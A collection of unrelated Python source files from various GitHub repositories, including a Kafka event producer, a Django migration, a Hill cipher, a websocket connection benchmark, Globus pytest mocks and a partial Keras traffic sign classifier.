040d0ed83078d0bb143b393b819c1df66128dcef
|
[] |
no_license
|
sidtandon2014/AnalyticsVidhya
|
1c19453e432147f0c75c636b995e0ce8e2d1c8d7
|
9e75578cb7edb0f552bd87da32021d17e9509a87
|
refs/heads/master
| 2021-06-24T03:52:28.880916
| 2020-12-16T14:55:36
| 2020-12-16T14:55:36
| 147,308,283
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,307
|
py
|
from kafka import KafkaProducer, KafkaClient
import csv
import json
import numpy as np
import time
from datetime import date
import pdb
class EventGenerator:
def __init__(self,bootstrapServers,topicName):
self.bootstrapServers = bootstrapServers
self.topicName = topicName
def readFile(self,filePath,indexRow = 0,secondsToAdd = 0):
producer = KafkaProducer(bootstrap_servers=self.bootstrapServers)
index = 0
with open(filePath, 'r',) as csvfile:
#reader =csv.reader(csvfile,delimiter = ",")
fieldNames = ["house_id","household_id","eventtimestamp","value","timestamp"]
reader = csv.DictReader(csvfile, fieldNames,delimiter = ",")
next(reader)
for row in reader:
if index >= indexRow:
ts = (np.int(row["eventtimestamp"]) + secondsToAdd) #np.int(row["timestamp"])
row["timestamp"] = ts
ts = ts * 1000
key = row["house_id"].encode('utf-8')
value =json.dumps(row).encode('utf-8')
pdb.set_trace()
producer.send(self.topicName,value = value,key = key,timestamp_ms = ts)
if index %1000 == 0:
print("Index %i" % index)
#time.sleep(.001)
index = index + 1
def createTopic(self,brokers,topicName):
client = KafkaClient(brokers)
client.ensure_topic_exists(topic=topicName)
brokerList = ["10.0.0.9","10.0.0.4","10.0.0.7"]
file = "F:\Sid\Learnings\Data Scientist\Analytics Vidhya\Sapient Challenge\household.csv"
topicName = "rawevents"
eventGen = EventGenerator(brokerList,topicName)
#eventGen.createTopic(brokerList,topicName)
"""
difference between Timestamp for 2018-07-10 09:19:09.607 and
max timestamp (1380578340) in data is 150636009
"""
secondsToAdd = 150635894
eventGen.readFile(file,indexRow=0,secondsToAdd=secondsToAdd)
"""
import csv
file = "F:\Sid\Learnings\Data Scientist\Analytics Vidhya\Sapient Challenge\dummy.csv"
with open(file) as csvfile:
reader = csv.reader(csvfile,delimiter = "\t")
for row in reader:
print(",".join(row[1:]))
"""
|
[
"siddharth.tandon1@gmail.com"
] |
siddharth.tandon1@gmail.com
|
6ec103878eced29e866f07f54b7c8de32b53129b
|
311291c4c0a6bb74827ecf019dde46d145013ec8
|
/find_stable_points.py
|
5a4f6f499f30f7d6b21a99ecf781075dcb872d00
|
[] |
no_license
|
goedel-gang/bifurcation_logistic_map
|
bd6361a8cbb1123d2293be37ab8b492d06db6c9a
|
aa37c9794ad830004de318c9b1f72c3c9929586e
|
refs/heads/master
| 2020-05-03T09:37:08.088101
| 2019-06-26T08:59:51
| 2019-06-26T08:59:51
| 178,559,017
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 536
|
py
|
import decimal
from time import sleep
def logi_map(x_n, r):
return r * x_n * (1 - x_n)
def stable_points(prec, f):
decimal.getcontext().prec = prec
x = decimal.Decimal(0.5)
seen = set()
while x not in seen:
seen.add(x)
x = f(x)
endpoint = x
x = f(x)
osc = [x]
while x != endpoint:
x = f(x)
osc.append(x)
return osc
if __name__ == "__main__":
for r in range(24, 35):
print(0.1 * r, stable_points(6, lambda x: logi_map(x, decimal.Decimal(0.1 * r))))
|
[
"izaak.van.dongen@gmail.com"
] |
izaak.van.dongen@gmail.com
|
8298294ab318bf5052e57b1984a626a4f03e7664
|
69591ed61e4414680de0c1cf574e175692d89301
|
/Practica4/datamodel/migrations/0001_initial.py
|
8c8739906a459c5092e9726316f922f733fff2ee
|
[] |
no_license
|
andressp05/InformationSystems-Project
|
52de1f44643c7af82d4177f63d3433d3c026b427
|
96af93ca8222bd69ee8faa320c200825bf0bc2e6
|
refs/heads/master
| 2022-04-10T13:12:24.199998
| 2020-03-26T17:51:21
| 2020-03-26T17:51:21
| 250,321,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,227
|
py
|
# Generated by Django 2.2.6 on 2019-11-26 00:22
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Counter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value', models.IntegerField(null=True)),
],
),
migrations.CreateModel(
name='Game',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cat1', models.IntegerField(default=0)),
('cat2', models.IntegerField(default=2)),
('cat3', models.IntegerField(default=4)),
('cat4', models.IntegerField(default=6)),
('mouse', models.IntegerField(default=59)),
('cat_turn', models.BooleanField(default=True)),
('status', models.IntegerField(default=0)),
('cat_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='games_as_cat', to=settings.AUTH_USER_MODEL)),
('mouse_user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='games_as_mouse', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Move',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('origin', models.IntegerField()),
('target', models.IntegerField()),
('date', models.DateField(default='2019-11-26')),
('game', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='moves', to='datamodel.Game')),
('player', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"andres.salas@estudiante.uam.es"
] |
andres.salas@estudiante.uam.es
|
0535495967d0332e764b0470f019bcb21263c717
|
e6b3a576d8c8bc79aa6d85aeb56f655553d36a3c
|
/Game_over.py
|
c40f0da50b054021a072328aedf3e24aaf35de5d
|
[] |
no_license
|
Lehsey/Game_antology_on_minimal
|
1d7e85c558614674e347d53f853d6e17e034fda8
|
e7f7efa08edcc0f90c6fd81b1792f5714db89aaa
|
refs/heads/master
| 2020-08-29T11:29:11.069314
| 2019-11-21T14:52:40
| 2019-11-21T14:52:40
| 218,019,012
| 0
| 1
| null | 2019-11-01T11:25:53
| 2019-10-28T10:14:14
|
Python
|
UTF-8
|
Python
| false
| false
| 2,100
|
py
|
from PyQt5 import QtWidgets as widget
import Records
class GameOver(widget.QWidget):
def __init__(self, game, rec):
super().__init__()
# initialization
self.game_name = game
self.rec = rec
self.setupUI()
def setupUI(self):
self.setWindowTitle('Game Over!')
#set up the interface
self.setupInputName()
self.setupButtons()
self.setupGrid()
self.setFixedSize(self.sizeHint())
def setupInputName(self):
self.input_name_text = widget.QLabel('Введите имя:', self)
self.input_name = widget.QLineEdit(self)
def setupButtons(self):
self.set_record = widget.QPushButton('Продолжить')
self.set_record.clicked.connect(self.setRecord)
self.cancel_button = widget.QPushButton('Отмена')
self.cancel_button.clicked.connect(self.close)
def setupGrid(self):
self.grid = widget.QVBoxLayout(self)
self.input_name_frame = widget.QWidget(self)
self.input_name_layout = widget.QHBoxLayout(self.input_name_frame)
self.input_name_layout.addWidget(self.input_name_text, 0)
self.input_name_layout.addWidget(self.input_name, 1)
self.buttons_frame = widget.QWidget(self)
self.buttons_layout = widget.QHBoxLayout(self.buttons_frame)
self.buttons_layout.addWidget(self.set_record)
self.buttons_layout.addWidget(self.cancel_button)
self.grid.addWidget(self.input_name_frame)
self.grid.addWidget(self.buttons_frame)
self.setLayout(self.grid)
def setRecord(self):
#save the record depending on the game
if self.game_name == "Змейка":
Records.set_rec(
self.game_name, self.input_name.text(), self.rec)
elif self.game_name == 'Ним':
Records.set_rec(
self.game_name, self.input_name.text(), self.rec)
self.hide()
|
[
"noreply@github.com"
] |
noreply@github.com
|
ee987387848f8cbe5c0ca7f34274b86608007c54
|
1abb8c4fed56b90f1820e68ee398dc4999a812e5
|
/Understandings/next.py
|
a30f43bf333dd37c43feeaff3b7d9773cc72b25b
|
[] |
no_license
|
tymurKoltunov/raspberryPI_foundation
|
de9b5355430556c6918fa498aa3ac4c23db64cd4
|
76020727c94139b5c5f46db410d03fd720320574
|
refs/heads/master
| 2022-09-18T01:02:09.488608
| 2020-06-04T03:52:47
| 2020-06-04T03:52:47
| 257,062,904
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 141
|
py
|
def countdown():
n = 4
while (n > 0):
yield n
n -= 1
c = countdown()
print(f"{c} + '1'")
print(f"{next(c)} + '2'")
|
[
"tymur.koltunov@nure.ua"
] |
tymur.koltunov@nure.ua
|
39d1f1d061ba1a605ac99d665358afaa10fee6bb
|
ef61ee0178686a1e371836188f97ad982e4123b8
|
/local/data/data_prep_TOCFL.py
|
fe59ef09a6176dd50c8e124f41dc8429b5647335
|
[] |
no_license
|
xiaoyeye1117/Chinese-ASR
|
17c138631da723a7163e00aca7ca2e34103f800f
|
be93ee6ab42f39e0f9c69b52b6acb4ec261ad4c9
|
refs/heads/master
| 2020-06-23T07:36:17.846508
| 2019-01-21T07:35:30
| 2019-01-21T07:35:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,015
|
py
|
import os,sys
def main(tocfl_path,file_type):
wavdir_path = os.path.join(tocfl_path,'wav')
wavdir_path = os.path.abspath(wavdir_path)
txt_path = os.path.join(tocfl_path,'txt')
for filename in os.listdir(wavdir_path):
wav_label = filename.split('.')[0]
wav_path = os.path.join(wavdir_path,filename)
txt_file = os.path.join(txt_path,wav_label+'.txt')
txt = open(txt_file,'r',encoding='UTF-8').read()
trans = txt.rstrip()
#trans = ' '.join(list(trans))
if file_type == 'text':
sys.path.append('local/data/tool/jieba-zh_TW')
import jieba
trans = ' '.join(jieba.cut(trans))
trans = trans.upper()
print(wav_label,trans)
elif file_type == 'wav.scp':
print(wav_label,wav_path)
elif file_type == 'utt2spk':
print(wav_label, wav_label)
if __name__ == '__main__':
tocfl_path = sys.argv[1]
file_type = sys.argv[2]
main(tocfl_path,file_type)
|
[
"jacky84228@hotmail.com"
] |
jacky84228@hotmail.com
|
9e1b09e46ad8b3cb9a2629079e9ecbfc3da05a97
|
968b33e7931bbbf32cfb8e7a7a9f7654778b3577
|
/prob 101~130/prob 129.py
|
c697ef406f1de7defed6f216dfeaff993ff23365
|
[] |
no_license
|
hoki1678/2020_Programming
|
f5ac77f07baad0fa7c231a224c546cc4e3231080
|
5778c340411d20cdc92c9a45eea14b4960b9ed0e
|
refs/heads/master
| 2022-11-22T21:24:05.468796
| 2020-07-25T02:55:19
| 2020-07-25T02:55:19
| 256,646,258
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
#129
a=input("주민등록번호를 입력하세요.: ")
b=(int(a[0])*2 + int(a[1])*3 + int(a[2])*4 + int(a[3])*5 + int(a[4])*6 + int(a[5])*7 + int(a[7])*8 + int(a[8])*9 + int(a[9])*2 + int(a[10])*3 + int(a[11])*4 + int(a[12])*5)
c=b%11
if (11 - c) % 10 == int(a[13]):
print("유효한 주민등록번호입니다.")
else:
print("유효하지 않은 주민등록번호입니다.")
|
[
"noreply@github.com"
] |
noreply@github.com
|
ea7fc7390b542d4dfea40144a9c5c6705e0968ac
|
6fc7ad0675e0ce0b4e08beb4d66709d4ab2a6c18
|
/Python代码/慕课网Python高级课程/chapter02-魔法函数/1.py
|
784ea91ab2f8c5b5f800484937308c92bca5785d
|
[] |
no_license
|
Nelocage/algorithm
|
81a6b733d158ba8df804f62b10bb08dbb7de591f
|
7957ded5dd68e145aa152eb05c6b221192942bf2
|
refs/heads/master
| 2020-03-27T11:12:17.893149
| 2018-09-08T14:59:19
| 2018-09-08T14:59:19
| 146,463,239
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,104
|
py
|
#Magic (dunder) functions are functions whose names start and end with double underscores
#A for loop obtains an iterator: it first looks for the class's __iter__ method; if that is missing, __getitem__ works too.
#Magic functions often have several alternatives; when a program needs some magic function,
#Python looks through the candidates, and implementing any one of them is enough
# Implementing magic functions adds features to a custom class; magic functions hook into Python's own syntax
# Study slicing operations
#Magic functions have nothing to do with which class your class inherits from
class magic():
#Common magic functions
#String representation
def __repr__(self):
pass
def __str__(self):
pass
#Collection / sequence related
def __len__(self):
pass
def __getitem__(self, item):
pass
def __setitem__(self, key, value):
pass
def __delitem__(self, key):
pass
def __contains__(self, item):
pass
#Iteration related
def __iter__(self):
pass
def __next__(self):
pass
#Callable
def __call__(self, *args, **kwargs):
pass
#with context manager
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
#Numeric conversion
def __abs__(self):
pass
def __bool__(self):
pass
def __int__(self):
pass
def __float__(self):
pass
def __hash__(self):
pass
#Metaclass related
def __new__(cls, *args, **kwargs):
pass
def __init__(self):
pass
#Attribute related
def __getattr__(self, item):
pass
def __setattr__(self, key, value):
pass
def __getattribute__(self, item):
pass
#def __setattribute__:
pass
def __dir__(self):
pass
#Attribute descriptors
def __get__(self, instance, owner):
pass
def __set__(self, instance, value):
pass
def __delete__(self, instance):
pass
#Coroutine related
def __await__(self):
pass
def __aiter__(self):
pass
def __anext__(self):
pass
def __aexit__(self, exc_type, exc_val, exc_tb):
pass
def __aenter__(self):
pass
|
[
"1784809727@qq.com"
] |
1784809727@qq.com
|
2ab57e0a422988c3ab9c0a083d6d0b87670ebc16
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_116/ch117_2020_03_23_21_27_19_174351.py
|
cc5e23b34f33ab76256d64d25a4ac3b24699c59a
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 98
|
py
|
from math import sin, asin
def snell_descartes(n1,n2,θ1):
    # Snell-Descartes law: n1*sin(θ1) = n2*sin(θ2), so θ2 = asin(n1*sin(θ1)/n2)
    θ2 = asin(n1*sin(θ1)/n2)
    return θ2
|
[
"you@example.com"
] |
you@example.com
|
4e4e1e1d0d5c76f9f06d146612d2ea99485180ea
|
1f212c57147e2f02471cd0f258108e2128af52b8
|
/HillChiper.py
|
9e1827fcd20fcd139141f32883551f53d03d11e3
|
[] |
no_license
|
sinamustopa1/HillCipher
|
0f0a59b66594d372751108d675e9579d4ad9c668
|
f4ae371f4f1663108414bb910c227a07ec81744e
|
refs/heads/master
| 2022-12-19T19:49:06.025597
| 2020-09-28T12:25:31
| 2020-09-28T12:25:31
| 299,298,962
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,294
|
py
|
# 140810180009 Naufal Ariful Amri
# 140810180011 Alfari Sidnan
# 140810180017 Sina Mustopa
import numpy as np
key_matrix = [[0] * 2 for t in range(2)]
key_mat = [[0] * 2 for t in range(2)]
chiper_text = [[0] * 2 for t in range(2)]
plain_text = [[0] * 2 for t in range(2)]
numbertext = [[0] for t in range(2)]
plaintext = [[0] for t in range(2)]
chipertext = [[0] for t in range(2)]
# Convert key characters to numbers
def getKeyNumber(key):
k = 0
for i in range (2):
for j in range(2):
key_matrix[i][j] = ord(key[k]) - 65
k += 1
return key_matrix
# Convert ciphertext characters to numbers
def getChNumber(key):
k = 0
for i in range (2):
for j in range(2):
chiper_text[i][j] = ord(key[k]) - 65
k += 1
return chiper_text
# Convert plaintext characters to numbers
def getPlNumber(key):
k = 0
for i in range (2):
for j in range(2):
plain_text[i][j] = ord(key[k]) - 65
k += 1
return plain_text
# encryption
def encrypt(text,key):
for i in range(2):
plaintext[i] = ord(text[i]) - 65
#apply the formula C = K * P
for i in range(2):
value = 0
for j in range(2):
value = value + key_matrix[i][j] * plaintext[j]
numbertext[i] = value % 26
#decryption
def decrypt(text,key):
#find the GCD (modular inverse of the determinant) of the key matrix
temp = np.linalg.det(key_matrix)
a = round(temp) % 26
b = 26
x,y, t1,t0 = 0,1, 1,0
while a != 0:
q, r = b//a , b%a
m, n = x-t1*q , y-t0 * q
b,a , x,y , t1,t0 = a,r ,t1,t0 , m,n
gcd = x % 26
t = np.linalg.inv(key_matrix) * temp * gcd
tek = np.round(t)
y = tek.astype(int)
for i in range(2):
chipertext[i] = ord(text[i]) - 65
#Apply the formula P = K^-1 * C
for i in range(2):
value = 0
for j in range(2):
value = value + y[i][j] * chipertext[j]
numbertext[i] = value % 26
def keyFunction(pl,ch):
#convert the ciphertext and plaintext to numbers
plain = getPlNumber(pl)
chiper = getChNumber(ch)
#find the determinants of the plain and cipher matrices
temp = np.linalg.det(chiper)
temp1 = np.linalg.det(plain)
#find the GCD of the ciphertext
a = round(temp)
b = 26
x,y, t1,t0 = 0,1, 1,0
while a != 0:
q, r = b//a , b%a
m, n = x-t1*q , y-t0 * q
b,a , x,y , t1,t0 = a,r ,t1,t0 , m,n
gcd = x % 26
#find the plain inverse via P^-1 = adj(P) * det^-1(C)
plain_invers = np.mod(np.linalg.inv(plain) * -temp1 * gcd, 26)
keey = np.dot(plain_invers,chiper)
y = np.round(np.mod(keey,26))
return y.astype(int)
def hillchiper(text, key, number):
getKeyNumber(key)
if number == 1:
encrypt(text,key)
for i in range (2):
chipertext[i] = chr(numbertext[i] + 65)
return chipertext
elif number == 2:
decrypt(text,key)
for i in range (2):
plaintext[i] = chr(numbertext[i] + 65)
return plaintext
else:
temp = keyFunction(text,key)
for i in range(2) :
for j in range(2):
key_mat[j][i] = chr(temp[i][j] + 65)
return key_mat
def main():
message = "FR"
message1 = "FRPQ"
pl = "FRID"
ch = "PQCF"
key = "HITD"
print('\nMessage : ' , message)
print('key : ' , key)
print ('Encrypt : ' , hillchiper(message,key,1))
print('\nMessage : ' , message1)
print('key : ' , key)
print ('Decrypt : ' , hillchiper(message1,key,2))
print('\nChiper : ' , message)
print('Plain: ' , message1)
print ('Key : ' , hillchiper(pl,ch,3))
if __name__ == "__main__":
main()
|
[
"mustopa.sina@gmail.com"
] |
mustopa.sina@gmail.com
|
f8ace194fe1d0bc32f6bd45242ff8b34795f06b7
|
e8ebf7028f03aee9794096693a09ddfd52c0b1cf
|
/TFDatabase/dataframe_controller.py
|
2b3fbe6411fa4b78707da895e739f79417ad8d6c
|
[] |
no_license
|
dagleaves/Miscellaneous
|
752159d231476e4186dedb971bed42bc9ce0cad4
|
a3742e366b51777a588a6dfbfad735fa8c656d89
|
refs/heads/main
| 2023-02-18T16:08:19.221525
| 2021-01-14T00:53:34
| 2021-01-14T00:53:34
| 302,792,451
| 0
| 0
| null | 2020-12-03T15:49:04
| 2020-10-10T01:54:20
|
Java
|
UTF-8
|
Python
| false
| false
| 269
|
py
|
import pandas as pd
try:
database = pd.read_csv('database.csv')
except FileNotFoundError:
response = input('File not found! Download database? (y/n)')
if response == '' or response.lower() == 'y':
pass
# Download database
def search(toy):
    pass  # placeholder body: the original file ends mid-definition
|
[
"68761152+dagleaves@users.noreply.github.com"
] |
68761152+dagleaves@users.noreply.github.com
|
382ec61b5d92e38174ded2840080940b3653dd40
|
d72505a7961bf7f96094a6c7013f3c794495044b
|
/client.py
|
4856fbb4f78c0f80314f35362b41858153512a26
|
[] |
no_license
|
520hacker/websocket-connetions-benchmark
|
fa6ce757ec9cd68c5bcd60a5421700af6ae4814b
|
af609d775742cfeca5714133cddea32c8b0c51c0
|
refs/heads/master
| 2020-06-05T19:20:43.277616
| 2019-02-13T08:08:55
| 2019-02-13T08:08:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,821
|
py
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# debug in python 3.6
#__author__ == 'ipcpu'
import websocket
import time
import threading
import json
import multiprocessing
from threadpool import ThreadPool, makeRequests
#Change this to your own websocket address
WS_URL = "ws://10.140.12.45:8888/"
#Number of processes
processes=5
#Number of threads (each process may be limited to 1024 open files; adjust fs.file and related parameters)
thread_num=5000
def on_message(ws, message):
print(message)
pass
def on_error(ws, error):
print(error)
pass
def on_close(ws):
print("### closed ###")
pass
def on_open(ws):
def send_trhead():
#Set the payload sent over your websocket
send_info = {"cmd": "refresh", "data": {"room_id": "58", "wx_user_id": 56431}}
#Send data every 10 seconds to keep the connection alive
while True:
time.sleep(10)
ws.send(json.dumps(send_info))
t = threading.Thread(target=send_trhead)
t.start()
def on_start(num):
time.sleep(num%20)
websocket.enableTrace(True)
ws = websocket.WebSocketApp(WS_URL + str(num),
on_message=on_message,
on_error=on_error,
on_close=on_close)
ws.on_open = on_open
ws.run_forever()
def thread_web_socket():
#Thread pool
pool = ThreadPool(thread_num)
num = list()
#Set how many threads to start
for ir in range(thread_num):
num.append(ir)
requests = makeRequests(on_start, num)
[pool.putRequest(req) for req in requests]
pool.wait()
if __name__ == "__main__":
#Process pool
pool = multiprocessing.Pool(processes=processes)
#Set how many processes to start
for i in range(processes):
pool.apply_async(thread_web_socket)
pool.close()
pool.join()
|
[
"you@example.com"
] |
you@example.com
|
b9285e56da882aaf22b415ed18ff86510bae43ee
|
3d4b7cc6b3117b40a4f388fa4e704abaa6001ce8
|
/readframe.py
|
386bc54cc4eefcaed3b077b2609b6d9a5e056a35
|
[] |
no_license
|
ald2004/pedestrian_track
|
3e5de1c68d811016413fefa09e2c0634bb2ca82e
|
f2d550e99a9c14a7485b9ccd2a4a2986993dc10a
|
refs/heads/master
| 2023-02-11T01:09:23.674210
| 2020-12-30T12:40:02
| 2020-12-30T12:40:02
| 318,141,401
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 565
|
py
|
import cv2
import time
cap = cv2.VideoCapture(0)
if not (cap.isOpened()):
print("Could not open video device")
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
while 1:
ret, frame = cap.read()
success, buffer = cv2.imencode(".jpg", frame)
buffer.tofile('video_feed1')
# with open('video_feed1', 'wb') as fid:
# cv2.imwrite(fid, frame)
# cv2.imshow('preview',frame)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
time.sleep(.5)
cap.release()
cv2.destroyAllWindows()
|
[
"yuanpu@139.com"
] |
yuanpu@139.com
|
a64e2e09dd7b30e5f219fc94a7b62eca86a430aa
|
b24492f688e59a72e30fb0504133d2e260aa88bf
|
/011_blackjack/angela_blackJack.py
|
bfcd91de5fe6ed22904b14b1d26c5a2b17c167ec
|
[] |
no_license
|
zenvin/100DaysOfCode
|
632da387a8f1022508091eecb8c07591b5219564
|
885c8833a3d56d9b6da05f0dc601aa4a00089742
|
refs/heads/main
| 2023-06-04T02:12:46.639881
| 2021-06-23T05:27:54
| 2021-06-23T05:27:54
| 369,921,097
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,215
|
py
|
import random
import os
from art import logo
def deal_card():
"""Returns a randomc card from the deck"""
cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]
card = random.choice(cards)
return card
def calculate_score(cards):
"""Take a list of cards and return a score for those cards"""
#instead of if 11 in cards and 10 in cards; just do 21
if sum(cards) == 21 and len(cards) == 2:
return 0
if 11 in cards and sum(cards) > 21:
cards.remove(11)
cards.append(1)
return sum(cards)
def compare(user_score, computer_score):
if user_score == computer_score:
return "Draw 😊"
elif computer_score == 0:
return "Lose, opponent has Blackjack 😢"
elif user_score == 0:
return "Win with a Blackjack 😎"
elif user_score > 21:
return "You went over. You lose."
elif computer_score > 21:
return "Opponent went over. You win. 😁"
elif user_score > computer_score:
return "You win 😄"
else:
return "You lose 😤"
def play_game():
print(logo)
user_cards = []
computer_cards = []
is_game_over = False
for _ in range(2):
user_cards.append(deal_card()) #combine lines 15 and 16
# new_card = deal_card()
# user_cards.append(new_card) #adds a single item
computer_cards.append(deal_card())
while not is_game_over:
user_score = calculate_score(user_cards)
computer_score = calculate_score(computer_cards)
print(f" Your cards: {user_cards}, current score: {user_score}")
print(f" Computer's first card: {computer_cards[0]}")
if user_score == 0 or computer_score == 0 or user_score > 21:
is_game_over = True
else:
user_should_deal = input("Type 'y' to get another card, type 'n' to pass: ")
if user_should_deal == 'y':
user_cards.append(deal_card())
else:
is_game_over = True
while computer_score != 0 and computer_score < 17:
computer_cards.append(deal_card())
computer_score = calculate_score(computer_cards)
print(f" Your final hand: {user_cards}, final score: {user_score}.")
print(f" Computer's final hand: {computer_cards}, final score: {computer_score}.")
print(compare(user_score, computer_score))
while input("Do you want to play a game of Black Jack? Type 'y' or 'n': ") == 'y':
os.system('cls')
play_game()
|
[
"zevin@protonmail.com"
] |
zevin@protonmail.com
|
b3bd6d7c6319d309c4fab6cf10a4e82d95fae6f3
|
f3e0663824268443985685538c972f94e86fe97f
|
/globus_contents_manager/tests/unit/tests.py
|
5ded953695041917c612978f7912f5c9a561acf7
|
[
"Apache-2.0"
] |
permissive
|
rpwagner/globus-contents-manager
|
370bf7b56eee968794028a52bbde27206f28684c
|
40ad5e8ef97686feff4ae36ff0f71b0c600c3e83
|
refs/heads/master
| 2020-08-13T02:05:46.821373
| 2019-08-19T16:55:07
| 2019-08-19T16:55:07
| 214,887,611
| 0
| 0
|
Apache-2.0
| 2019-10-13T20:17:27
| 2019-10-13T20:17:27
| null |
UTF-8
|
Python
| false
| false
| 2,439
|
py
|
from unittest.mock import Mock
import pytest
import globus_sdk
# from .mocks import GlobusTransferTaskResponse
from . import testfuncs
class MockGlobusResponse:
"""Mimics the GlobusSDK Response object"""
data = {}
@pytest.fixture
def mock_ls_response():
"""Mock an operation_ls response to return the following data."""
r = MockGlobusResponse()
r.data = {'DATA': [{'name': 'foo.txt'}, {'name': 'bar.txt'}]}
return r
@pytest.fixture
def mock_operation_ls(monkeypatch, mock_ls_response):
"""Mock the globus_sdk directly, so anything that calls
TransferClient.operation_ls() is mocked with a mock_ls_response. NOTE! This
will not work for any modules that do
'from globus_sdk import TransferClient'. This is because the module will
import the class before we mock it."""
mock_transfer_instance = Mock()
mock_transfer_instance.operation_ls.return_value = mock_ls_response
mock_transfer_class = Mock(return_value=mock_transfer_instance)
monkeypatch.setattr(globus_sdk, 'TransferClient', mock_transfer_class)
    return mock_transfer_class  # hand back the patched TransferClient class rather than the fixture function itself
@pytest.fixture
def mock_get_transfer_client(monkeypatch, mock_ls_response):
"""Mocking the 'get_transfer_client' function"""
mock_transfer_instance = Mock()
mock_transfer_instance.operation_ls.return_value = mock_ls_response
mock_get_tc = Mock(return_value=mock_transfer_instance)
monkeypatch.setattr(testfuncs, 'get_transfer_client', mock_get_tc)
    return mock_get_tc  # hand back the patched get_transfer_client factory so tests can inspect its calls
def test_make_directory(mock_get_transfer_client):
"""Testing the creation of a new directory (using operation_mkdir)"""
response_str = testfuncs.make_directory()
assert response_str == "Success"
def test_rename(mock_get_transfer_client):
"""Testing the rename operation (operation_rename)"""
response_str = testfuncs.rename()
assert response_str == "Success"
def test_count_files(mock_operation_ls):
output = testfuncs.count_files()
assert output == 2
def test_count_files_again(mock_get_transfer_client):
output = testfuncs.count_files()
assert output == 2
def test_dir_exists():
dirs = testfuncs.get_dir_names()
assert 'shared_dir' in dirs
def test_file_exists():
files = testfuncs.get_file_names()
assert 'file1.txt' in files
def get(mock_get_transfer_client):
pass
def save(mock_get_transfer_client):
pass
def delete_file(mock_get_transfer_client):
pass
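# These are plain pytest stubs; a typical invocation (assuming pytest is installed and the
# run happens from the repository root) might be:
#   pytest globus_contents_manager/tests/unit/tests.py -q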
|
[
"netta.en@gmail.com"
] |
netta.en@gmail.com
|
139fc43ea6710f50dbe6f5a4640851fdeeae124a
|
a86db906f3acb78a8921814ab295265bc98c4a73
|
/BackEnd/ObjectRecognition/trafficsignnet.py
|
b5ff088721f28614fac2ee38789b07d003fdfee2
|
[] |
no_license
|
filipbozic00/Traffic-analizer
|
f431250e8adeb1eda645ee1579bc5f3bf29a6a8b
|
53a08c45a857db01f0b4c28412d92c8ce2616776
|
refs/heads/master
| 2023-06-25T03:02:44.199759
| 2021-07-20T13:40:13
| 2021-07-20T13:40:13
| 387,800,728
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,674
|
py
|
import cv2
from imutils.convenience import resize
from matplotlib import pyplot as plt
import numpy as np
import imutils
import pytesseract as tess
import tensorflow
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import BatchNormalization
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import MaxPooling2D
from tensorflow.keras.layers import Activation
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import Dropout
from tensorflow.keras.layers import Dense
from tensorflow.python.keras.layers.convolutional import Conv
tess.pytesseract.tesseract_cmd = r'C:\Program Files\Tesseract-OCR\tesseract.exe'
class TrafficSignNet:
@staticmethod
#image dimension, depth and number of classes in the dataset
def build(width, height, depth, classes):
# initialize the model along with the input shape to be
# "channels last" and the channels dimension itself
model = Sequential()
inputShape = (height, width, depth)
chanDim = -1
# CONV => RELU => BN => POOL
model.add(Conv2D(8, (5,5), padding="same", input_shape=inputShape))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(MaxPooling2D(pool_size=(2,2)))
# first set of (CONV => RELU => CONV => RELU) * 2 => POOL
model.add(Conv2D(16, (3,3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(Conv2D(16, (3,3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(MaxPooling2D(pool_size=(2,2)))
# second set of (CONV => RELU => CONV => RELU) * 2 => POOL
model.add(Conv2D(32, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(Conv2D(32, (3, 3), padding="same"))
